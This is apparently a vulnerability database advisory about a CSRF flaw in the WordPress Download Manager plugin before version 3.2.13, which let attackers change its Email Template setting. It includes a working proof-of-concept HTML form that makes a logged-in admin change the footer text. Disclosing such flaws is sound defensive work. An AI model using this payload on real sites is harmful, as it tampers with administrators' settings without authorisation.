WordPress Plugin Vulnerabilities
WordPress Download Manager < 3.2.13 - Email Template Setting Update via CSRF
Description
The plugin did not have CSRF check in place before saving its Email Template setting, allowing attackers to make a logged in admin change them via a CSRF attack
Proof of Concept
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php?action=wpdm_save_email_setting" method="POST">
<input type="hidden" name="__wpdm_email_template" value="default.html" />
<input type="hidden" name="__wpdm_email_setting[logo]" value="" />
<input type="hidden" name="__wpdm_email_setting[banner]" value="" />
<input type="hidden" name="__wpdm_email_setting[footer_text]" value="Changed Via CSRF" />
<input type="hidden" name="__wpdm_email_setting[facebook]" value="" />
<input type="hidden" name="__wpdm_email_setting[twitter]" value="" />
<input type="hidden" name="__wpdm_email_setting[youtube]" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Affects Plugins
Fixed in version 3.2.13
References
Classification
Miscellaneous
Verified
Yes
Timeline
Publicly Published
2021-08-09 (about 1 years ago)
Added
2021-08-09 (about 1 years ago)
Last Updated
2021-08-09 (about 1 years ago)